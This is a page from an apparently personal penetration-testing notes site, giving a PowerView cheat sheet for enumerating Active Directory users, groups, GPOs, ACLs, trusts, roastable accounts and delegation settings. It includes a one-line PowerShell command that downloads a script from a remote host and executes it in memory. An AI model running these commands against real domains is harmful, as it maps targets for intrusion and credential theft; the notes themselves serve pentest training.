VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
      • Theory
        • Nmap
        • Wireless
        • OSI Model - TCP/IP
        • R* Service
        • Hash
        • Solaris
        • SIP
        • Cisco Password Encryption
        • Time to Live
        • Windows
          • WMIC
          • IIS Version
          • Windows Version
          • Active Directory
        • Linux
        • Database
          • Page 7
          • MSSQL
          • PostgreSQL
          • MySQL
        • Asymmetric Encryption
        • Symmetric Encryption
        • Tools
        • ICMP
        • IP Address
        • VLAN
        • Acronyms
        • HTTP Status
        • HTTP Method
        • Protocol
        • Common Ports
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • Import-Module
  • Get-Domain
  • Get-DomainSID
  • Get-DomainController
  • Get-DomainPolicyData
  • Get-DomainUser
  • Get-DomainComputer
  • Get-DomainOU
  • Get-DomainGroup
  • Get-DomainGPO
  • Get-DomainGPOLocalGroup
  • Get-DomainGPOUserLocalGroupMapping
  • Get-DomainObjectACL
  • GenericAll
  • GenericWrite
  • Get-DomainTrust
  • Get-ForestDomain
  • Kerberoast
  • ASREPRoast
  • Unconstrained Delegation
  • Constrained Delegation
  • Find-DomainShare
  • Find-LocalAdminAccess
  1. Offensive Treasure
  2. AD Attack
  3. Domain Enumeration

PowerView

Extra: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview

Import-Module

Import-Module PowerView.ps1
. .\PowerView.ps1
iex(new-object net.webclient).DownloadString('http://10.10.10.10/PowerView.ps1')

Get-Domain

Get-Domain
Get-Domain -Domain vulnableone.local

Get-DomainSID

Get-DomainSID
Get-DomainSID -Domain vulnableone.local

Get-DomainController

Get-DomainController | select Forest, Name, OSVersion | fl
Get-DomainController -Domain vulnableone.local

Get-DomainPolicyData

Get-DomainPolicyData | select -expand SystemAccess
(Get-DomainPolicyData).KerberosPolicy
(Get-DomainPolicyData -Domain techcorp.local).KerberosPolicy

Get-DomainUser

Get-DomainUser | select samaccountname, pwdlastset, logoncount
Get-DomainUser -Identity khan.chanthou -Properties DisplayName, MemberOf | fl
Get-DomainUser -LDAPFilter "Description=*built*" | select name, Description
Get-DomainUser -LDAPFilter "name=*admin*" | select name, Description

Get-DomainComputer

Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
Get-DomainComputer -OperatingSystem "Windows Server 2019*"
Get-DomainComputer -OperatingSystem "Windows 11*"
Get-DomainComputer -Ping

Get-DomainOU

Get-DomainOU -Properties Name | sort -Property Name
Get-DomainOU | select name, gplink
(Get-DomainOU).distinguishedname | %{Get-DomainComputer -SearchBase $_} | Get-DomainGPOComputerLocalGroupMapping
(Get-DomainOU -Identity Sales).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

Get-DomainGroup

Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroup *admin* | select name
Get-DomainGroup -Domain vulnableone.local | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroup *admin* -Domain vulnableone.local | select name
Get-DomainGroup -UserName khan.chanthou | select name
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
Get-NetLocalGroup -ComputerName WST1    #LocalAdmin
Get-NetLocalGroupMember -ComputerName WST1    #LocalAdmin
Get-NetLocalGroupMember -ComputerName WST1 -GroupName Administrators    #LocalAdmin

Get-DomainGPO

Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -ComputerIdentity WST1 -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -Identity '{6AC1786C-016F-11D2-945F-00C04fB984F9}'

Get-DomainGPOLocalGroup

Get-DomainGPOLocalGroup | select GPODisplayName, GroupName

Get-DomainGPOUserLocalGroupMapping

This is useful for finding where domain groups have local admin access.

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Get-DomainGPOUserLocalGroupMapping -Identity khan.chanthou -Verbose

Get-DomainObjectACL

Get-DomainObjectAcl -Identity khan.chanthou -ResolveGUIDs
Get-DomainObjectAcl -Searchbase "LDAP://CN=Domain Admins,CN=Users,DC=vulnableone,DC=local" -ResolveGUIDs -Verbose
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "khan.chanthou"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "IT_Groups"}

GenericAll

Users

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.ActiveDirectoryRights -eq $("GenericAll")) {$_}}

Group

Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

GenericWrite

User

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Where-Object { $_.ActiveDirectoryRights -like '*GenericWrite*' } | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Computer

Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Where-Object { $_.ActiveDirectoryRights -like '*GenericWrite*' }

Get-DomainTrust

Get-DomainTrust
Get-DomainTrust -Domain vulnableone.local

Get-ForestDomain

Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
Get-ForestTrust
Get-ForestTrust -Forest vulnableone.local
# External Trust
Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'}

Kerberoast

Get-DomainUser -SPN | select serviceprincipalname

ASREPRoast

Get-DomainUser -PreauthNotRequired

Unconstrained Delegation

Get-DomainComputer -Unconstrained
Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION -Properties distinguishedname

Constrained Delegation

Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto, useraccountcontrol 
Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto, useraccountcontrol

Find-DomainShare

Find-DomainShare -CheckShareAccess

Find-LocalAdminAccess

Find-LocalAdminAccess -Verbose
PreviousDomain EnumerationNextAD-Module

Last updated 1 year ago

🧙‍♂️